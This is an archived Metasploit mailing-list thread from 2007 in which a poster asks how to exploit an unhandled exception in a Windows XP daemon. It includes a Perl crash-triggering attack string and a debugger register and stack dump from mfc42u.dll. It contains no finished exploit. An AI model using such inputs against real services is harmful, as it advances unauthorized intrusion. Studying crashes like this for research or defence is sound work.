Metasploit mailing list archives
How to exploit unhandled exception
From: thomas.werth at vahle.de (Thomas Werth)
Date: Mon, 12 Feb 2007 11:46:52 +0100
i send this data to app $attackstring = "A" ; $attackstring .= "\x0a"; $attackstring .= "\x11\x12\x20\x25\x05" x 5; $attackstring .= "A" x 5000;#320; sometimes it is needed to send data twice. When debugger stops adress 0x727F1FC2 is given with unhandled exception. Here is register information EAX 007EA58C ---> Stack[00000A04]:007EA58C db 63h ; c Stack[00000A04]:007EA58D db 73h ; s Stack[00000A04]:007EA58E db 6Dh ; m Stack[00000A04]:007EA58F db 0E0h ; ? Stack[00000A04]:007EA590 db 1 Stack[00000A04]:007EA591 db 0 Stack[00000A04]:007EA592 db 0 Stack[00000A04]:007EA593 db 0 Stack[00000A04]:007EA594 db 0 Stack[00000A04]:007EA595 db 0 Stack[00000A04]:007EA596 db 0 Stack[00000A04]:007EA597 db 0 Stack[00000A04]:007EA598 db 5Bh ; [ Stack[00000A04]:007EA599 db 2Ah ; * Stack[00000A04]:007EA59A db 81h ; ? <--- EBX 727F8E5B -> mfc42u.dll:727F8E5B call near ptr mfc42u_1258 ECX 0 EDC 0000003 ESI 0 EDI 77BFC407 -> msvcrt.dll:77BFC407 msvcrt_malloc db 8Bh EBP 007EA630 ---------> Stack[00000A04]:007EA630 db 12h Stack[00000A04]:007EA631 db 11h Stack[00000A04]:007EA632 db 0Ah Stack[00000A04]:007EA633 db 41h ; A Stack[00000A04]:007EA634 db 60h ; ` Stack[00000A04]:007EA635 db 8Eh ; ? Stack[00000A04]:007EA636 db 7Fh ; Stack[00000A04]:007EA637 db 72h ; r Stack[00000A04]:007EA638 db 41h ; A Stack[00000A04]:007EA639 db 43h ; C Stack[00000A04]:007EA63A db 7Ah ; z Stack[00000A04]:007EA63B db 72h ; r Stack[00000A04]:007EA63C db 12h Stack[00000A04]:007EA63D db 11h <------------------------- ESP 007EA62C ----------> Stack[00000A04]:007EA630 db 12h Stack[00000A04]:007EA631 db 11h Stack[00000A04]:007EA632 db 0Ah Stack[00000A04]:007EA633 db 41h ; A Stack[00000A04]:007EA634 db 60h ; ` Stack[00000A04]:007EA635 db 8Eh ; ? Stack[00000A04]:007EA636 db 7Fh ; Stack[00000A04]:007EA637 db 72h ; r Stack[00000A04]:007EA638 db 41h ; A Stack[00000A04]:007EA639 db 43h ; C Stack[00000A04]:007EA63A db 7Ah ; z Stack[00000A04]:007EA63B db 72h ; r <----------- EIP 727F1FC3 -> mfc42u.dll:727F1FC3 db 0CCh //above and behind even more 0cch Let me know what more information is needed . Waiting for your hints ;) mmiller at hick.org schrieb:
Can you paste some of the information from the debugger about the unhandled exception? It's hard to answer the question generically as it really depends on what type of exception you're triggering and how the data you're sending relates to the exception that is generated. On Mon, Feb 12, 2007 at 08:11:45AM +0100, Thomas Werth wrote:Hello, i poked around a bit with a daemon service on xp. When sending special chars the attached debugger stops and reports an unhandled exception. As i'm new to exploit writing ( well i manage to write exploits for buffer overflows ) , i don't know how to get control of daemon app using unhandled exception. How to do this ? Where can i find examples for exploiting this kind of exception ? thx Thomas
Current thread:
- How to exploit unhandled exception Thomas Werth (Feb 11)
- How to exploit unhandled exception mmiller at hick.org (Feb 11)
- How to exploit unhandled exception Thomas Werth (Feb 12)
- How to exploit unhandled exception mmiller at hick.org (Feb 12)
- How to exploit unhandled exception Thomas Werth (Feb 12)
- How to exploit unhandled exception mmiller at hick.org (Feb 11)